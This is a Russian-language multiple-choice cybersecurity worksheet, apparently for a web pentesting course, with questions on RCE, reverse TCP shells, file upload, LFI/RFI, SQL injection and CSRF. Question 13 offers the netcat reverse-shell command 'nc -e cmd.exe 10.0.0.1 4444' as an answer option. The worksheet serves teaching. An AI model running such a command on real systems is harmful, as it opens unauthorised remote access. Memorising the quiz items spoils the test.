wayground logo

Free Printable Worksheets

NEW

Font size

S
M
L
XL
Worksheets

Вопросы рабочего листа по кибербезопасности

Total questions: 23

Worksheet time: 12mins

Name
Class
Date
1.

В каком языке чаще всего встречаются RCE-уязвимости из-за динамической интерпретации?

a)

PHP

b)

GO

c)

Java

d)

HTML

2.

Какое действие помогает снизить риск RCE?

a)

Очистка и фильтрация пользовательского ввода

b)

Хеширование паролей

c)

Кэширование страниц

d)

Использование HTTPS

3.

Что описывает обратное TCP-соединение (Reverse TCP)?

a)

Сценарий, при котором программа на целевом хосте инициирует исходящее TCP-соединение к машине атакующего, обходя ограничения на входящие подключения

b)

Метод защиты сети, при котором сервер принимает только входящие соединения из доверенной подсети

c)

Тип сетевого сканирования, используемый для обнаружения открытых TCP-портов на удалённом хосте

d)

Механизм шифрования TCP-трафика между клиентом и сервером для предотвращения перехвата данных

4.

Какой инструмент используется для создания и управления обратными TCP-сеансами?

a)

MetaSploit

b)

Wireshark

c)

Nmap

d)

Hashcat

5.

Что происходит после успешного установления обратного TCP-сеанса?

a)

Атакующий получает интерактивную оболочку (shell) удалённой системы и может выполнять команды через TCP-соединение

b)

TCP-соединение автоматически разрывается после проверки доступности хоста

c)

На целевой системе запускается только процесс сетевого сканирования без возможности выполнения команд

d)

Соединение используется исключительно для передачи зашифрованных лог-файлов на сервер атакующего

6.

Что представляет собой уязвимость загрузки файлов?

a)

Возможность загрузки вредоносного файла на сервер

b)

Ошибка при передаче данных через FTP

c)

Недоступность сервера изза размера файла

d)

Потеря соединения с клиентом

7.

Какой файл чаще используется злоумышленником для эксплуатации File Upload уязвимости?

a)

php

b)

html

c)

xml

d)

jpg

8.

Какой метод эффективнее предотвращает уязвимость загрузки файлов?

a)

Проверка MIME-типа и пути сохранения

b)

Сжатие загружаемых данных

c)

Запись логов сервера

d)

Ограничение размера файлов

9.

Что характеризует LFI (Local File Inclusion)?

a)

Включение локальных файлов

b)

Внедрение SQL-запросов

c)

Открытие порта сервера

d)

Перенаправление на внешний ресурс

10.

Что характеризует RFI (Remote File Inclusion)?

a)

Подключение удалённого файла по URL

b)

Ошибка HTTP заголовков

c)

Встраивание SQL-запроса

d)

Подключение локального файла

11.

Какова основная цель итогового отчёта пентеста?

a)

Демонстрация уровня взлома

b)

Анализ скорости отклика сайта

c)

Подробное описание найденных уязвимостей и способов их решения

d)

Сокрытие следов атак

12.

Какой шаг рекомендуется после завершения пентеста?

a)

Провести повторный пентест

b)

Передать результаты владельцу сайта

c)

Сменить IP-адрес

d)

Опубликовать найденные уязвимости

13.

Какая команда Netcat используется для запуска обратной оболочки в Windows?

a)

nc -zv 10.0.0.1 80

b)

nc -listen 80

c)

nc -e cmd.exe 10.0.0.1 4444

d)

nc -lvp 4444

14.

Какой тип уязвимости чаще всего позволяет добиться RCE при неверной обработке пользовательских данных?

a)

HTML Injection

b)

SQL Injection

c)

XSS

d)

Command Injection

15.

Какой набор инструментов чаще всего используется при веб-пентестинге?

a)

Nmap, Filezilla, paint

b)

Wireshark, wordpress, python

c)

GIMP, Netcat, Github

d)

Metasploit, BurpSuit, Nikto

16.

Какая из следующих практик не поможет предотвратить CSRF?

a)

Публичное раскрытие секретного ключа

b)

Применение SameSite Strict для cookie

c)

Проверка заголовков Origin/Referer

d)

Использование уникальных CSRF токенов

17.

Что такое SQL Injection?

a)

Введение произвольного SQL-кода через пользовательский ввод

b)

Авто восстановление таблиц

c)

Метод оптимизации

d)

Процесс шифрования данных в БД

18.

Что является основной причиной SQL Injection уязвимости?

a)

Использование большого количества таблиц

b)

Длинные запросы

c)

Неверная конфигурация сервера

d)

Отсутствие фильтрации и параметризации

19.

Какой тип SQLi показывает подробную ошибку, помогающую атакующему?

a)

Out-of-band

b)

Error-based

c)

Blind-based

d)

Static-based

20.

Что является примером Error-Based SQL Injection?

a)

Обход CSRF токена

b)

Изменение времени ответа

c)

Ответы только true/false

d)

Получение SQL-ошибки с именами таблиц

21.

Blind-Based SQLi обычно характеризуется:

a)

Использованием ошибок для получения структуры БД

b)

Необходимостью анализа косвенных признаков

c)

Полным отсутствием ответа от сервера

d)

Авто выводом таблиц

22.

Какой подтип Blind SQL Injection основан на задержках?

a)

Error-based

b)

Boolean-based

c)

Time-based

d)

Cookie-based

23.

Что такое CSRF-атака?

a)

Анализ SQL-запросов

b)

Атака, подменяющая DNS-запросы

c)

Эксплуатация ошибки сериализации

d)

Перехват трафика по ARP

e)

Атака, в которой злоумышленник заставляет браузер жертвы выполнить нежелательный запрос